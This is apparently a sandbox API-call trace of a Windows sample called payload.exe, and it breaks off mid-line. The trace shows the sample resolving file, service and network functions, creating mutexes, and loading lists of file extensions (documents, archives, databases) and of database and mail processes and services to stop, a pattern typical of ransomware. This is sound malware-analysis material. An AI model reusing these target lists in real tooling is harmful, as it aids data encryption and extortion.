# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jul 9 2019 16:03:52 # Log Creation Date: 19.07.2019 18:23:06.528 Process: id = "1" image_name = "payload.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\payload.exe" page_root = "0x4ddbe000" os_pid = "0x964" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\payload.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x968 [0026.414] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileW") returned 0x76c49af0 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesW") returned 0x76c31b18 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameW") returned 0x76c3dd0e [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameA") returned 0x76c4b6e0 [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexW") returned 0x76c3424c [0026.415] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDrives") returned 0x76c35371 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="OpenMutexW") returned 0x76c35151 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForMultipleObjects") returned 0x76c34220 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiW") returned 0x76c4d5cd [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseMutex") returned 0x76c3111e [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersion") returned 0x76c34467 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0026.416] GetProcAddress (hModule=0x76c20000, lpProcName="ExpandEnvironmentStringsW") returned 0x76c34173 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceFrequency") returned 0x76c341f0 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileAttributesW") returned 0x76c4d4f7 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="GetVolumeInformationW") returned 0x76c4c860 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="CreatePipe") returned 0x76cb415b [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleInformation") returned 0x76c4195c [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringW") returned 0x76c33bca [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringA") returned 0x76c33c5a [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTime") returned 0x76c35a96 [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="SystemTimeToFileTime") returned 0x76c35a7e [0026.417] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0026.418] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0026.418] GetProcAddress (hModule=0x76c20000, lpProcName="Process32NextW") returned 0x76c5896c [0026.418] GetProcAddress (hModule=0x76c20000, lpProcName="Process32FirstW") returned 0x76c58baf [0026.418] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74d40000 [0027.841] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExW") returned 0x74d546ad [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6 [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="OpenProcessToken") returned 0x74d54304 [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="GetTokenInformation") returned 0x74d5431c [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="OpenSCManagerW") returned 0x74d4ca64 [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="OpenServiceW") returned 0x74d4ca4c [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="CloseServiceHandle") returned 0x74d5369c [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="ControlService") returned 0x74d67144 [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="QueryServiceStatus") returned 0x74d52a86 [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="EnumDependentServicesW") returned 0x74d41e3a [0027.842] GetProcAddress (hModule=0x74d40000, lpProcName="EnumServicesStatusExW") returned 0x74d4b466 [0027.842] LoadLibraryA (lpLibFileName="user32.dll") returned 0x74f40000 [0028.764] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0028.764] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0030.833] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46 [0030.833] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0030.834] GetProcAddress (hModule=0x77130000, lpProcName="NtQuerySystemInformation") returned 0x7714fda0 [0030.834] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74b50000 [0030.931] GetProcAddress (hModule=0x74b50000, lpProcName="WNetCloseEnum") returned 0x74b52dd6 [0030.931] GetProcAddress (hModule=0x74b50000, lpProcName="WNetOpenEnumW") returned 0x74b52f06 [0030.931] GetProcAddress (hModule=0x74b50000, lpProcName="WNetEnumResourceW") returned 0x74b53058 [0030.931] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x75bc0000 [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="WSAStartup") returned 0x75bc3ab2 [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="socket") returned 0x75bc3eb8 [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="recv") returned 0x75bc6b0e [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="connect") returned 0x75bc6bdd [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="closesocket") returned 0x75bc3918 [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="gethostbyname") returned 0x75bd7673 [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="inet_addr") returned 0x75bc311b [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="ntohl") returned 0x75bc2d57 [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="htonl") returned 0x75bc2d57 [0031.178] GetProcAddress (hModule=0x75bc0000, lpProcName="htons") returned 0x75bc2d8b [0031.178] GetProcessHeap () returned 0x5d0000 [0031.178] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20) returned 0x5e40d0 [0031.178] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdb8 | out: lpPerformanceCount=0x18fdb8*=15147029394) returned 1 [0031.179] GetTickCount () returned 0x1813f [0031.179] GetCurrentProcessId () returned 0x964 [0031.179] GetTickCount () returned 0x1813f [0031.179] GetTickCount () returned 0x1813f [0031.179] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20) returned 0x5e40f8 [0031.179] GetVersion () returned 0x1db10106 [0031.180] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x7) returned 0x5d36b8 [0031.180] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e0bd8 [0031.180] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e0bd8, Size=0x20) returned 0x5e4148 [0031.180] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4148, Size=0x40) returned 0x5e46b8 [0031.180] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x5e4908 [0031.180] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_0ZI89UA") returned 0x0 [0031.180] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_0ZI89UA") returned 0x84 [0031.180] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5d36b8 | out: hHeap=0x5d0000) returned 1 [0031.180] lstrlenW (lpString="Global\\syncronize_") returned 18 [0031.180] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e46b8 | out: hHeap=0x5d0000) returned 1 [0031.180] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x7) returned 0x5d36b8 [0031.181] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e0bd8 [0031.181] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e0bd8, Size=0x20) returned 0x5e4148 [0031.181] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4148, Size=0x40) returned 0x5e46b8 [0031.181] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x5f4910 [0031.181] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_0ZI89UU") returned 0x0 [0031.181] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_0ZI89UU") returned 0x88 [0031.181] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5d36b8 | out: hHeap=0x5d0000) returned 1 [0031.181] lstrlenW (lpString="Global\\syncronize_") returned 18 [0031.181] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e46b8 | out: hHeap=0x5d0000) returned 1 [0031.181] GetVersion () returned 0x1db10106 [0031.181] GetCurrentProcess () returned 0xffffffff [0031.181] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fda4 | out: TokenHandle=0x18fda4*=0x8c) returned 1 [0031.181] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fda0, TokenInformationLength=0x4, ReturnLength=0x18fdac | out: TokenInformation=0x18fda0, ReturnLength=0x18fdac) returned 1 [0031.181] CloseHandle (hObject=0x8c) returned 1 [0031.181] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0 [0031.181] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x3e8) returned 0x0 [0031.181] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5d36b8 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e0bd8 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e0bd8, Size=0x20) returned 0x5e4148 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4148, Size=0x40) returned 0x5e46b8 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e46b8, Size=0x80) returned 0x5e46b8 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e46b8, Size=0x100) returned 0x5e46b8 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x34) returned 0x5e47c0 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e07c8 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e07d8 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e07e8 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e0bd8 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e4800 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e0bf0 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4800, Size=0x8) returned 0x5e4800 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e0c08 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4800, Size=0x10) returned 0x5e4800 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e0c20 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e0c38 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4800, Size=0x20) returned 0x5e4800 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e0c50 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e0c68 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e07c8, Size=0x8) returned 0x5e07c8 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e07d8, Size=0x8) returned 0x5e07d8 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e4828 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e0c80 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e4838 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e0c98 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4838, Size=0x8) returned 0x5e4838 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604930 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4838, Size=0x10) returned 0x5e4838 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604948 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e4850 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4838, Size=0x20) returned 0x5e4860 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e07c8, Size=0x10) returned 0x5e4838 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e07d8, Size=0x10) returned 0x5e4888 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e07c8 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x604960 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e07d8 [0031.182] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604978 [0031.182] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e07d8, Size=0x8) returned 0x5e07d8 [0031.183] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e48a0 [0031.183] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x604990 [0031.183] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e48b0 [0031.183] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6049a8 [0031.183] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e48b0, Size=0x8) returned 0x5e48b0 [0031.183] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4838, Size=0x20) returned 0x604d18 [0031.183] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4888, Size=0x20) returned 0x604d40 [0031.183] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e4888 [0031.183] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6049c0 [0031.183] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e4838 [0031.183] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6049d8 [0031.183] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4838, Size=0x8) returned 0x5e4838 [0031.183] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x604d68 [0031.183] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x604d88 [0031.183] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0031.183] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e46b8 | out: hHeap=0x5d0000) returned 1 [0031.183] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18fdf0 | out: lpWSAData=0x18fdf0) returned 0 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6049f0 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6049f0, Size=0x20) returned 0x5e4350 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4350, Size=0x40) returned 0x5e4710 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4710, Size=0x80) returned 0x5e4710 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4710, Size=0x100) returned 0x605060 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6049f0 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6049f0, Size=0x20) returned 0x5e4350 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4350, Size=0x40) returned 0x5e4710 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4710, Size=0x80) returned 0x5e4710 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4710, Size=0x100) returned 0x605168 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6049f0 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e4710 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4710, Size=0x8) returned 0x5e4710 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e4720 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4710, Size=0x10) returned 0x5e4740 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x5e4758 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1a) returned 0x5e4350 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4740, Size=0x20) returned 0x5e4778 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1c) returned 0x5e4378 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x16) returned 0x5e47a0 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1a) returned 0x5e43a0 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x604a20 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e4710 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40) returned 0x605270 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4710, Size=0x8) returned 0x5e4710 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3c) returned 0x6052b8 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4710, Size=0x10) returned 0x5e4740 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x605300 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x605320 [0031.196] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4740, Size=0x20) returned 0x605340 [0031.196] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x605368 [0031.196] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0031.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605060 | out: hHeap=0x5d0000) returned 1 [0031.196] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0031.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605168 | out: hHeap=0x5d0000) returned 1 [0031.197] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6058e8 [0031.202] EnumServicesStatusExW (in: hSCManager=0x6058e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 0 [0031.208] GetLastError () returned 0xea [0031.208] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x11e4) returned 0x6091e8 [0031.208] EnumServicesStatusExW (in: hSCManager=0x6058e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6091e8, cbBufSize=0x11e4, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6091e8, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 1 [0031.209] CloseServiceHandle (hSCObject=0x6058e8) returned 1 [0031.213] lstrlenW (lpString="Appinfo") returned 7 [0031.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0031.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0031.213] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0031.213] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0031.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0031.213] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0031.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0031.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0031.213] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0031.213] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0031.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0031.213] lstrlenW (lpString="AudioSrv") returned 8 [0031.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0031.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0031.213] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0031.213] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0031.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0031.213] lstrlenW (lpString="BFE") returned 3 [0031.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0031.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0031.213] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0031.213] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0031.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0031.213] lstrlenW (lpString="CryptSvc") returned 8 [0031.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0031.214] lstrcmpiW 